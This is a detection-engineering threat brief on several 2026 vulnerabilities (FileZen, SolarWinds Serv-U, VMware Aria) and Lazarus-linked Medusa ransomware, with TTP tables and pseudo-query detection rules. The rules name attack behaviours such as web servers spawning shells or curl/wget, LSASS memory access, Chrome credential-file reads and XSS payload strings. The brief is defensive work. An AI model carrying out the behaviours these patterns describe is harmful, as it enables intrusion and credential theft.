Cyber Threat Brief — February 25, 2026
Cyber Threat Brief — February 25, 2026
Window: February 24–25, 2026 | Audience: Detection Engineers
Detection Engineering Brief | Wednesday, February 25, 2026 | 05:00 PT
1. CVE-2026-25108 — FileZen OS Command Injection (CISA KEV, Active Exploitation)
What’s New
CISA added CVE-2026-25108 to the Known Exploited Vulnerabilities catalog on February 24, 2026, after Soliton Systems confirmed receiving “multiple reports of damage” from exploitation in the wild. Timing correlation with a ransomware incident at Japan’s Washington Hotel suggests the flaw may already be weaponized for pre-ransomware access.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2026-25108 |
| CVSS | 8.7 (CVSSv4) |
| Affected | FileZen v4.2.1–4.2.8, v5.0.0–v5.0.10 (physical & virtual) |
| Exploit | Confirmed in-the-wild; no public PoC |
| Vendor | Soliton Systems K.K. (Tokyo-based, government/enterprise customer base) |
| Patch | Upgrade to v5.0.11 or later |
| FCEB Deadline | March 17, 2026 |
Root Cause: OS command injection via a specially crafted HTTP POST request to a specific field on the post-login admin screen. The vulnerability is only exploitable when the FileZen Antivirus Check Option is enabled. Does not affect FileZen S.
Access Requirements: Authenticated, low-privileged user account (general user tier). The attacker must either compromise an existing account via phishing/credential spray or guess credentials.
Forensic Note: FileZen’s file-monitoring feature for system directories logs file modifications — if the system directory files were altered during exploitation, those logs should contain evidence.
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 — Exploit Public-Facing App | HTTP POST requests to FileZen admin panel from unusual IPs |
| Execution | T1059.004 — Unix Shell | OS command spawned from web server process (java/nginx/apache) |
| Credential Access | T1078 — Valid Accounts | Low-privilege account login followed by admin-level behavior |
| Impact | T1486 — Data Encrypted for Impact | Ransomware deployment post-exploitation (unconfirmed, circumstantial) |
Detection Opportunities
# Web server spawning shell processes (linux)
process.parent.name IN ("java", "nginx", "httpd", "python")
AND process.name IN ("sh", "bash", "cmd.exe", "powershell.exe")
AND event.type = "process_start"
# HTTP POST to FileZen admin endpoints
http.request.method = "POST"
AND url.path CONTAINS "/fileupload" OR url.path CONTAINS "/antivirus"
AND http.response.status_code IN (200, 302)
AND source.ip NOT IN [known_admin_IPs]
# FileZen system directory file modification (if monitoring enabled)
file.path CONTAINS "/opt/filezen/system/" AND event.type = "change"
# Password reset storm (post-compromise indicator)
# Multiple user password changes in short window from FileZen adminInvestigate: Examine FileZen access logs for the timeframe around the suspicious activity. Look for:
- Logins with general user accounts followed by unexpected admin operations
- HTTP requests with unusual character encoding in form fields
- New processes spawned by the FileZen JVM/web server
Log Sources
- FileZen access logs (system directory file monitoring)
- Web application firewall logs
- EDR (process creation from web server parent)
- Network flow logs (C2 callbacks post-exploitation)
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No FileZen-specific rules |
| Splunk ESCU | ❌ Gap — File transfer command injection (generic pattern only via Ivanti Connect Secure Command Injection Attempts) |
| Elastic | ⚠️ Partial — Web Server Potential Command Injection Request (generic) |
| KQL | ❌ Gap |
Recommendation: Create a Sigma rule for web server spawning unexpected OS shells, and monitor FileZen-specific log paths if deployed.
Sources
- Help Net Security — CISA flags FileZen CVE-2026-25108 — Published February 25, 2026
- The Hacker News — CISA Confirms Active Exploitation — Published February 25, 2026
- JPCERT/CC Advisory JVN84622767 — Published February 24, 2026
2. SolarWinds Serv-U 15.5 — Four Critical RCEs (CVE-2025-40538/39/40/41)
What’s New
SolarWinds published security advisory and Serv-U 15.5.4 release notes on February 24, 2026, addressing a cluster of four critical vulnerabilities all rated CVSS 9.1. No in-the-wild exploitation yet, but Serv-U has an extensive exploitation history (CVE-2021-35211 by Chinese APT Storm-0322, CVE-2024-28995 mass exploitation). This pattern makes rapid weaponization highly likely.
Technical Details
| Field | Value |
|---|---|
| CVE | CVE-2025-40538, CVE-2025-40539, CVE-2025-40540, CVE-2025-40541 |
| CVSS | 9.1 (Critical) — all four |
| Affected | SolarWinds Serv-U version 15.5 (FTP Server + MFT editions) |
| Platforms | Windows, Linux |
| Exploit | No public PoC; attack chain documented in advisory |
| Patch | Upgrade to Serv-U 15.5.4 |
CVE-by-CVE:
| CVE | Type | Impact |
|---|---|---|
| CVE-2025-40538 | Broken Access Control | Create system admin user → arbitrary code as root via domain/group admin |
| CVE-2025-40539 | Type Confusion | Execute arbitrary native code as root |
| CVE-2025-40540 | Type Confusion | Execute arbitrary native code as root |
| CVE-2025-40541 | IDOR (Insecure Direct Object Reference) | Execute native code as root |
Important caveat: All four require existing admin-level credentials (domain admin or group admin). Risk amplifier: compromised admin credentials via phishing, password reuse, or credential spraying make these escalation paths immediately exploitable. Windows deployments are less critical because Serv-U typically runs as a less-privileged service account.
Orca Security researchers (credited for discovery) note: “In real-world scenarios where administrative credentials are compromised — through phishing, password reuse, or credential spraying — they significantly increase the impact of that compromise.”
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Privilege Escalation | T1078.002 — Domain Accounts | Admin account used to create new system admin user |
| Execution | T1059 — Command and Scripting | Unexpected process spawning from Serv-U service |
| Credential Access | T1110.003 — Password Spraying | Admin credential compromise preceding exploitation |
| Persistence | T1098 — Account Manipulation | New administrator account created in Serv-U |
| Defense Evasion | T1036 — Masquerading | Serv-U running as root on Linux performing unexpected system ops |
Detection Opportunities
# New admin user created in Serv-U (event log)
EventID = 4720 (Windows) OR Linux audit: useradd/usermod
parent_process = "ServU.exe" OR "servud"
# Unexpected privileged process from Serv-U
process.parent.name IN ("ServU.exe", "servud")
AND process.name IN ("cmd.exe", "powershell.exe", "sh", "bash")
AND NOT process.args CONTAINS [known_legit_args]
# Type confusion/IDOR: Serv-U making network connections to unusual destinations
network.destination.ip NOT IN [known_sftp_clients]
AND process.name = "ServU.exe"
AND event.category = "network"
# Credential spray targeting Serv-U (FTP/SFTP auth failures)
event.action = "authentication_failure"
AND service.name IN ("Serv-U", "FTP", "SFTP")
AND source.ip aggregated > 50 failures in 5 minutesLog Sources
- SolarWinds Serv-U application logs
- Windows Event Log (4720, 4728, 4732 — account/group changes)
- EDR process creation
- Syslog (Linux — PAM auth, useradd)
- Network flow logs (FTP/SFTP port 21/22/990 traffic)
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No Serv-U-specific rules for these CVEs |
| Splunk ESCU | ❌ Gap — No file transfer server RCE detection |
| Elastic | ⚠️ Partial — File Transfer Utility Launched from Unusual Parent (generic) |
| KQL | ❌ Gap |
Recommendation: Monitor SolarWinds Serv-U logs for unexpected admin account creation. Given the exploitation history of Serv-U, prioritize patching to 15.5.4 immediately.
Sources
- Help Net Security — Serv-U four critical RCEs — Published February 25, 2026
- The Hacker News — SolarWinds Patches 4 Critical Serv-U Flaws — Published February 25, 2026
3. Lazarus Group × Medusa Ransomware — Healthcare & Middle East Targeting
What’s New
Symantec’s Threat Hunter Team (Broadcom) published research on February 24, 2026 revealing North Korean Lazarus Group affiliates are now operating as Medusa ransomware-as-a-service affiliates. This is the first confirmed link between Lazarus and Medusa. Four U.S. healthcare and nonprofit organizations were claimed on Medusa’s leak site since November 2025, including a mental health nonprofit and an educational facility for autistic children.
Technical Details
| Field | Value |
|---|---|
| Threat Actor | Lazarus Group (subgroup: Andariel/Stonefly — possibly also Diamond Sleet overlap) |
| Ransomware | Medusa RaaS (operated by “Spearwing”) |
| Targets | U.S. healthcare organizations, Middle East entity |
| Average Ransom | $260,000 |
| Total Medusa Claims | 366+ attacks since 2023 launch |
| IOCs | Provided by Symantec (network infra + file hashes) |
Toolset observed in Lazarus-linked Medusa attacks:
| Tool | Type | Attribution |
|---|---|---|
| Comebacker | Custom backdoor/loader | Lazarus-exclusive |
| Blindingcan | Remote Access Trojan | Lazarus-exclusive |
| ChromeStealer | Chrome credential extractor | Lazarus-linked |
| Infohook | Information stealer | Lazarus-linked |
| Mimikatz | Credential dumping | Commodity |
| RP_Proxy | Custom proxy tool | Lazarus-linked |
| Curl | Data transfer | Commodity |
Strategic context: Lazarus (via Stonefly/Andariel) uses ransomware proceeds to fund espionage operations targeting U.S., Taiwan, and South Korean defense/government/tech sectors. The July 2025 U.S. DOJ indictment of Rim Jong Hyok (RGB/Stonefly) for healthcare ransomware attacks did not deter operations.
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1566 — Phishing | Spear phishing leading to Comebacker execution |
| Execution | T1059.003 — Windows Command Shell | Comebacker/Blindingcan command execution |
| Credential Access | T1555.003 — Browser Credentials | ChromeStealer targeting Chrome Login Data db |
| Credential Access | T1003.001 — LSASS Memory | Mimikatz process injection |
| Collection | T1113 — Screen Capture | Infohook screenshot capabilities |
| Command & Control | T1090.002 — External Proxy | RP_Proxy for encrypted C2 routing |
| Exfiltration | T1041 — Exfiltration Over C2 | Curl-based data staging/transfer |
| Impact | T1486 — Data Encrypted for Impact | Medusa ransomware deployment |
Detection Opportunities
# ChromeStealer: Access to Chrome credential database
file.path CONTAINS "\\Google\\Chrome\\User Data\\Default\\Login Data"
AND process.name NOT IN ("chrome.exe", "chromium.exe", "msedge.exe", "opera.exe")
AND event.type IN ("open", "read")
# Comebacker/Blindingcan: Backdoor characteristics
# Often masquerades as legitimate Windows DLLs
ImageLoaded CONTAINS ".dll"
AND Signed = false
AND (
ParentImage CONTAINS "\\system32\\"
AND NOT CommandLine CONTAINS [known-legit-patterns]
)
# Mimikatz: LSASS access
process.name NOT IN ("lsass.exe", "svchost.exe", "MsMpEng.exe")
AND process.target.name = "lsass.exe"
AND event.action = "OpenProcess"
AND access.rights IN (0x1010, 0x1410)
# RP_Proxy: Custom proxy detection
# Unusual outbound TCP connections from non-browser processes
network.destination.port IN (443, 8443, 8080)
AND process.name NOT IN ("chrome.exe", "firefox.exe", "msedge.exe")
AND network.direction = "outbound"
AND network.bytes_out > 100000
# Infohook: Screenshot capture behavior
process.name NOT IN ("snippingtool.exe", "SnippingTool.exe")
AND process.args CONTAINS "screenshot" OR
event.api_call = "BitBlt" AND process.name != "dwm.exe"Log Sources
- EDR (process creation, DLL loading, LSASS access)
- Sysmon Event IDs: 1 (process), 7 (image load), 10 (process access), 11 (file create)
- Windows Event Log: 4688 (process creation), 4656 (object access)
- Web proxy / firewall logs (C2 callbacks)
- File integrity monitoring on Chrome profile paths
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ Mimikatz DC Sync, Mimikatz Use, HackTool - Mimikatz Execution — Mimikatz covered |
| Sigma | ✅ Suspicious File Access to Browser Credential Storage — ChromeStealer covered |
| Sigma | ❌ Gap — No Comebacker/Blindingcan/Infohook/RP_Proxy specific rules |
| Splunk ESCU | ✅ Linux Medusa Rootkit — Medusa Linux payload detection |
| Splunk ESCU | ❌ Gap — No Comebacker/Blindingcan rules |
| Elastic | ✅ Ransomware - Detected - Elastic Defend — Generic ransomware |
| KQL | ❌ Gap |
Recommendation: Lazarus-specific tooling (Comebacker, Blindingcan, Infohook) requires custom YARA/Sigma rules based on IOCs from the Symantec report. Priority: healthcare SOCs should enable ChromeStealer and LSASS access detections immediately.
Sources
- Symantec/Broadcom Threat Intelligence — Lazarus Medusa Ransomware — Published February 24, 2026
- BleepingComputer — North Korean Lazarus group linked to Medusa — Published February 24, 2026
- The Hacker News — Lazarus Group Uses Medusa Ransomware — Published February 24, 2026
4. VMware Aria Operations — VMSA-2026-0001 (RCE + XSS + Privilege Escalation)
What’s New
Broadcom released VMSA-2026-0001 on February 24, 2026 addressing three vulnerabilities in VMware Aria Operations. The most severe (CVE-2026-22719, CVSS 8.1) allows unauthenticated remote code execution during support-assisted product migrations. This affects VMware Cloud Foundation 4.x/5.x/9.x and Telco Cloud Platform environments — widely deployed in enterprise and telecom infrastructure.
Technical Details
| CVE | CVSS | Type | Auth | Description |
|---|---|---|---|---|
| CVE-2026-22719 | 8.1 | Command Injection → RCE | None | Exploitable during migration support windows; workaround KB430349 available |
| CVE-2026-22720 | 8.0 | Stored XSS | Low (Privileged user) | Custom benchmark creation → admin script execution; no workaround |
| CVE-2026-22721 | 6.2 | Privilege Escalation | High (vCenter) | vCenter-privileged actors gain Aria Operations admin access |
Affected Products:
| Product | Affected Versions | Fixed Version |
|---|---|---|
| VMware Aria Operations | 8.x | 8.18.6 |
| VMware Cloud Foundation (VCF) | 9.x | 9.0.2.0 |
| VMware Cloud Foundation | 5.x, 4.x | KB92148 |
| VMware Telco Cloud Platform | 5.x, 4.x | KB428241 |
| VMware Telco Cloud Infrastructure | 3.x, 2.x | KB428241 |
CVE-2026-22719 Attack Vector: Exploitable only during support-assisted migrations — this implies either a specific time window or that attacker-controlled migration triggers could be induced. The unauthenticated nature (AV:N/AC:H/PR:N) makes it particularly dangerous if that migration state can be triggered externally.
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 — Exploit Public-Facing App | Unauthenticated requests to Aria Operations API during migration |
| Execution | T1059 — Command and Scripting | OS commands executed from Aria Operations service account |
| Privilege Escalation | T1548 — Abuse Elevation Control | vCenter account → Aria Operations admin |
| Persistence | T1505.003 — Web Shell | Post-RCE web shell placement in Aria Operations web root |
| Collection | T1560 — Archive Collected Data | Stored XSS leveraged to exfiltrate monitoring data/credentials |
Detection Opportunities
# CVE-2026-22719: Unexpected process from Aria Operations service
process.parent.name IN ("vmware-vcops", "analytix", "casa", "vcops-*")
AND process.name IN ("sh", "bash", "python", "wget", "curl")
AND NOT process.args CONTAINS [known_migration_scripts]
# CVE-2026-22720: Stored XSS payload pattern in benchmark definitions
# Monitor Aria Ops API for unusual benchmark creation requests
http.request.uri CONTAINS "/suite-api/api/policy" OR "/suite-api/api/alertdefinitions"
AND http.request.body CONTAINS ("<script", "javascript:", "onerror=", "onload=")
# CVE-2026-22721: vCenter → Aria Ops privilege escalation
# Unexpected admin session from vCenter service account
event.action = "login"
AND user.name CONTAINS "vcsystemaccount" OR user.name CONTAINS "vcenter"
AND destination.service = "aria-operations-admin"
# Post-exploitation: Lateral movement from monitoring infrastructure
# Aria Ops has visibility into all monitored VMs — high-value pivot point
process.parent = "vcops*"
AND network.destination.ip NOT IN [known_monitored_endpoints, aria_ops_server]Log Sources
- VMware Aria Operations audit log (
/data/vcops/log/analytics/) - vCenter Server audit log
- EDR (if agent deployed on Aria Ops VM)
- Web application firewall (API gateway logs)
- syslog/journald on Aria Ops appliance
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No VMware Aria Operations-specific detection rules |
| Splunk ESCU | ❌ Gap |
| Elastic | ❌ Gap |
| KQL | ❌ Gap |
Recommendation: VMware Aria Operations monitors your entire virtual infrastructure. Compromise gives attackers visibility into every monitored endpoint, VM performance data, and potentially stored credentials. Treat as critical infrastructure — patch immediately, apply KB430349 as interim for CVE-2026-22719.
Sources
- Broadcom Security Advisory VMSA-2026-0001 — Published February 24, 2026
- CyberPress — Multiple VMware Aria Vulnerabilities Enable RCE — Published February 24, 2026
5. IBM X-Force Threat Index 2026 + Sophos Active Adversary Report — Intelligence Summary
What’s New
Two major annual threat intelligence reports dropped today/yesterday with actionable statistics for detection program prioritization.
IBM X-Force Threat Intelligence Index 2026
Published: February 25, 2026
Key findings relevant to detection engineering:
| Stat | Figure | Detection Implication |
|---|---|---|
| Public-facing app exploitation | +44% YoY | Prioritize WAF/web server behavioral detections |
| ChatGPT credentials on dark web (2025) | 300,000+ | Infostealer detection critical; AI platform credentials = enterprise access path |
| Distinct ransomware/extortion groups | 109 groups (up from 73) | Signature-based ransomware detection insufficient; behavior needed |
| Supply chain incidents | 4× increase over 5 years | CI/CD, SaaS integration, and developer identity monitoring |
| Top targeted industry | Manufacturing | OT/ICS SOC teams should elevate priority |
| Ransomware ecosystem fragmentation | Top 10 groups’ dominance −25% | Expect unknown RaaS affiliates; don’t rely on IOC lists alone |
Source: IBM X-Force Threat Intelligence Index 2026 — Published February 25, 2026
Sophos Active Adversary Report 2026
Published: February 24, 2026
Key findings:
| Stat | Figure | Detection Implication |
|---|---|---|
| Identity-related incident root cause | 67% of all IR/MDR cases | MFA bypass, token theft, and Kerberoasting detections are highest ROI |
| Top ransomware groups | Akira (GOLD SAHARA), Qilin (GOLD FEATHER) | Ensure specific TTPs for both are covered |
| Threat groups observed | Record high | Attribution-independent behavioral detection more important than ever |
Key TTP focus for Akira/Qilin:
- Akira: ESXi locker, legitimate VPN abuse, double extortion
- Qilin: VMware ESXi targeting, BYOD exploitation, living-off-the-land techniques
Source: Sophos Active Adversary Report 2026 — Published February 24, 2026
Coverage Gap Summary
| Gap Area | Priority | Recommendation |
|---|---|---|
| FileZen web server command injection | HIGH | Create Sigma: web server spawning OS shell |
| Serv-U admin account creation | HIGH | Monitor SolarWinds Serv-U logs + Windows account creation events |
| Comebacker/Blindingcan backdoor | HIGH | Request IOCs from Symantec report; build YARA |
| VMware Aria Operations API abuse | MEDIUM | Instrument Aria Ops audit logs → SIEM |
| AI credential harvesting (ChatGPT/Copilot) | MEDIUM | Add AI platform credential stores to infostealer monitoring |
Sources verified with original publications. All threats confirmed published February 24–25, 2026.